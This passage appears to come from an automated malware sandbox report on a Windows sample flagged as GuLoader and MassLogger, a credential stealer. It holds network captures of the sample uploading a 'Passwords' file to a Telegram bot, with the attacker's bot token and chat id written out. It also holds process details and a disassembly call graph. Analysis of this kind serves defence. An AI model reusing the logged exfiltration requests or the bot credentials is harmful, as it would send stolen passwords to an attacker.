                                                                                                          2025-01-10 22:12:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 64 32 38 34 30 35 31 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd348d28405116Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:55 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:55 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:55 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44818,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547175,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.950046149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:56 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd34b0a4c9392c
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 62 30 61 34 63 39 33 39 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd34b0a4c9392cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:56 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:56 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 532
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:56 UTC532INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44819,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547176,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          38192.168.2.950048149.154.167.220443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:13:01 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd319a08d3505f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:13:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 61 30 38 64 33 35 30 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd319a08d3505fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:13:01 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:13:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:13:01 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44820,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547181,"document":{"file_name":"U


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:17:10:51
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\rXKfKM0T49.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5 hash:948A8F01FCA4EECDDBCB1C20B26A0A53
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:17:11:35
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\rXKfKM0T49.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5 hash:948A8F01FCA4EECDDBCB1C20B26A0A53
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:20%
                                                                                                            Total number of Nodes:1599
                                                                                                            Total number of Limit Nodes:38
                                                                                                            execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4190 405b88 lstrcatW 4186->4190 4191 405b7e 4186->4191 4193 405b93 lstrlenW FindFirstFileW 4190->4193 4191->4190 4191->4193 4192 405c82 4303 405cbd lstrlenW CharPrevW 4192->4303 4194 405c59 4193->4194 4204 405bb5 4193->4204 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4204 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4207 405450 24 API calls 4202->4207 4206 405450 24 API calls 4203->4206 4204->4197 4208 405afa 60 API calls 4204->4208 4210 405450 24 API calls 4204->4210 4276 4063e8 lstrcpynW 4204->4276 4277 405ab2 4204->4277 4285 405450 4204->4285 4296 4061ae MoveFileExW 4204->4296 4206->4180 4209 405ca5 4207->4209 4208->4204 4211 4061ae 36 API calls 4209->4211 4210->4197 4213 405cac 4211->4213 4213->4180 4229 406417 4215->4229 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4229 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4229 4225 406558 GetWindowsDirectoryW 4225->4229 4226 40667c 5 API calls 4226->4229 4227 40640a 10 API calls 4227->4229 4228 4065d3 lstrcatW 4228->4229 4229->4216 4229->4219 4229->4220 4229->4223 4229->4225 4229->4226 4229->4227 4229->4228 4230 40658c SHGetSpecialFolderLocation 4229->4230 4241 4062b6 4229->4241 4246 40632f wsprintfW 4229->4246 4247 4063e8 lstrcpynW 4229->4247 4230->4229 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4229 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4237 4066ff 4233->4237 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4237 4235->4233 4235->4237 4237->4234 4238 406725 4237->4238 4238->4173 4239->4233 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4229 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4229 4247->4229 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4204 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4204 4284->4283 4287 40546b 4285->4287 4295 40550d 4285->4295 4286 405487 lstrlenW 4288 4054b0 4286->4288 4289 405495 lstrlenW 4286->4289 4287->4286 4290 40640a 17 API calls 4287->4290 4292 4054c3 4288->4292 4293 4054b6 SetWindowTextW 4288->4293 4291 4054a7 lstrcatW 4289->4291 4289->4295 4290->4286 4291->4288 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4204 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4204 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4192 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4311 405d97 4307->4311 4310 405d92 CharNextW 4308->4310 4308->4311 4309 405dbb 4309->4262 4309->4263 4310->4309 4311->4309 4312 405cea CharNextW 4311->4312 4312->4311 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4367 40165b 4365->4367 4370 40164a SetCurrentDirectoryW 4370->4367 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4882 401e49 4883 402c1f 17 API calls 4882->4883 4884 401e4f 4883->4884 4885 402c1f 17 API calls 4884->4885 4886 401e5b 4885->4886 4887 401e72 EnableWindow 4886->4887 4888 401e67 ShowWindow 4886->4888 4889 402ac5 4887->4889 4888->4889 5288 70091000 5291 7009101b 5288->5291 5298 70091516 5291->5298 5293 70091020 5294 70091024 5293->5294 5295 70091027 GlobalAlloc 5293->5295 5296 7009153d 3 API calls 5294->5296 5295->5294 5297 70091019 5296->5297 5300 7009151c 5298->5300 5299 70091522 5299->5293 5300->5299 5301 7009152e GlobalFree 5300->5301 5301->5293 4890 40264a 4891 402c1f 17 API calls 4890->4891 4900 402659 4891->4900 4892 402796 4893 4026a3 ReadFile 4893->4892 4893->4900 4894 405f61 ReadFile 4894->4900 4895 40273c 4895->4892 4895->4900 4904 405fbf SetFilePointer 4895->4904 4896 4026e3 MultiByteToWideChar 4896->4900 4897 402798 4913 40632f wsprintfW 4897->4913 4900->4892 4900->4893 4900->4894 4900->4895 4900->4896 4900->4897 4901 402709 SetFilePointer MultiByteToWideChar 4900->4901 4902 4027a9 4900->4902 4901->4900 4902->4892 4903 4027ca SetFilePointer 4902->4903 4903->4892 4905 405fdb 4904->4905 4912 405ff3 4904->4912 4906 405f61 ReadFile 4905->4906 4907 405fe7 4906->4907 4908 406024 SetFilePointer 4907->4908 4909 405ffc SetFilePointer 4907->4909 4907->4912 4908->4912 4909->4908 4910 406007 4909->4910 4911 405f90 WriteFile 4910->4911 4911->4912 4912->4895 4913->4892 4914 404dcc GetDlgItem GetDlgItem 4915 404e1e 7 API calls 4914->4915 4923 405037 4914->4923 4916 404ec1 DeleteObject 4915->4916 4917 404eb4 SendMessageW 4915->4917 4918 404eca 4916->4918 4917->4916 4919 404ed9 4918->4919 4920 404f01 4918->4920 4922 40640a 17 API calls 4919->4922 4925 40435f 18 API calls 4920->4925 4921 4051c7 4928 4051d1 SendMessageW 4921->4928 4929 4051d9 4921->4929 4930 404ee3 SendMessageW SendMessageW 4922->4930 4924 4050fc 4923->4924 4926 40511b 4923->4926 4931 405097 4923->4931 4924->4926 4935 40510d SendMessageW 4924->4935 4932 404f15 4925->4932 4926->4921 4927 4053af 4926->4927 4933 405174 SendMessageW 4926->4933 4934 4043c6 8 API calls 4927->4934 4928->4929 4940 4051f2 4929->4940 4941 4051eb ImageList_Destroy 4929->4941 4945 405202 4929->4945 4930->4918 4936 404d1a 5 API calls 4931->4936 4937 40435f 18 API calls 4932->4937 4933->4927 4938 405189 SendMessageW 4933->4938 4939 4053bd 4934->4939 4935->4926 4949 4050a8 4936->4949 4954 404f23 4937->4954 4943 40519c 4938->4943 4940->4945 4946 4051fb GlobalFree 4940->4946 4941->4940 4942 404ff8 GetWindowLongW SetWindowLongW 4948 405011 4942->4948 4955 4051ad SendMessageW 4943->4955 4944 405371 4944->4927 4947 405383 ShowWindow GetDlgItem ShowWindow 4944->4947 4945->4944 4960 404d9a 4 API calls 4945->4960 4965 40523d 4945->4965 4946->4945 4947->4927 4950 405017 ShowWindow 4948->4950 4951 40502f 4948->4951 4949->4924 4970 404394 SendMessageW 4950->4970 4971 404394 SendMessageW 4951->4971 4953 404f73 SendMessageW 4953->4954 4954->4942 4954->4953 4956 404ff2 4954->4956 4958 404fc0 SendMessageW 4954->4958 4959 404faf SendMessageW 4954->4959 4955->4921 4956->4942 4956->4948 4958->4954 4959->4954 4960->4965 4961 40502a 4961->4927 4962 405347 InvalidateRect 4962->4944 4963 40535d 4962->4963 4972 404cd5 4963->4972 4964 40526b SendMessageW 4966 405281 4964->4966 4965->4964 4965->4966 4966->4962 4968 4052e2 4966->4968 4969 4052f5 SendMessageW SendMessageW 4966->4969 4968->4969 4969->4966 4970->4961 4971->4923 4975 404c0c 4972->4975 4974 404cea 4974->4944 4976 404c25 4975->4976 4977 40640a 17 API calls 4976->4977 4978 404c89 4977->4978 4979 40640a 17 API calls 4978->4979 4980 404c94 4979->4980 4981 40640a 17 API calls 4980->4981 4982 404caa lstrlenW wsprintfW SetDlgItemTextW 4981->4982 4982->4974 5305 4016cc 5306 402c41 17 API calls 5305->5306 5307 4016d2 GetFullPathNameW 5306->5307 5308 40170e 5307->5308 5309 4016ec 5307->5309 5310 401723 GetShortPathNameW 5308->5310 5311 402ac5 5308->5311 5309->5308 5312 40672b 2 API calls 5309->5312 5310->5311 5313 4016fe 5312->5313 5313->5308 5315 4063e8 lstrcpynW 5313->5315 5315->5308 5316 40234e 5317 402c41 17 API calls 5316->5317 5318 40235d 5317->5318 5319 402c41 17 API calls 5318->5319 5320 402366 5319->5320 5321 402c41 17 API calls 5320->5321 5322 402370 GetPrivateProfileStringW 5321->5322 5323 4044cf lstrlenW 5324 4044f0 WideCharToMultiByte 5323->5324 5325 4044ee 5323->5325 5325->5324 5326 404850 5327 40487c 5326->5327 5328 40488d 5326->5328 5387 405a32 GetDlgItemTextW 5327->5387 5330 404899 GetDlgItem 5328->5330 5362 4048f8 5328->5362 5331 4048ad 5330->5331 5335 4048c1 SetWindowTextW 5331->5335 5339 405d68 4 API calls 5331->5339 5332 4049dc 5336 404b8b 5332->5336 5389 405a32 GetDlgItemTextW 5332->5389 5333 404887 5334 40667c 5 API calls 5333->5334 5334->5328 5340 40435f 18 API calls 5335->5340 5338 4043c6 8 API calls 5336->5338 5343 404b9f 5338->5343 5344 4048b7 5339->5344 5345 4048dd 5340->5345 5341 40640a 17 API calls 5346 40496c SHBrowseForFolderW 5341->5346 5342 404a0c 5347 405dc5 18 API calls 5342->5347 5344->5335 5351 405cbd 3 API calls 5344->5351 5348 40435f 18 API calls 5345->5348 5346->5332 5349 404984 CoTaskMemFree 5346->5349 5350 404a12 5347->5350 5352 4048eb 5348->5352 5353 405cbd 3 API calls 5349->5353 5390 4063e8 lstrcpynW 5350->5390 5351->5335 5388 404394 SendMessageW 5352->5388 5355 404991 5353->5355 5358 4049c8 SetDlgItemTextW 5355->5358 5363 40640a 17 API calls 5355->5363 5357 4048f1 5360 4067c2 5 API calls 5357->5360 5358->5332 5359 404a29 5361 4067c2 5 API calls 5359->5361 5360->5362 5369 404a30 5361->5369 5362->5332 5362->5336 5362->5341 5364 4049b0 lstrcmpiW 5363->5364 5364->5358 5366 4049c1 lstrcatW 5364->5366 5365 404a71 5391 4063e8 lstrcpynW 5365->5391 5366->5358 5368 404a78 5370 405d68 4 API calls 5368->5370 5369->5365 5374 405d09 2 API calls 5369->5374 5375 404ac9 5369->5375 5371 404a7e GetDiskFreeSpaceW 5370->5371 5373 404aa2 MulDiv 5371->5373 5371->5375 5373->5375 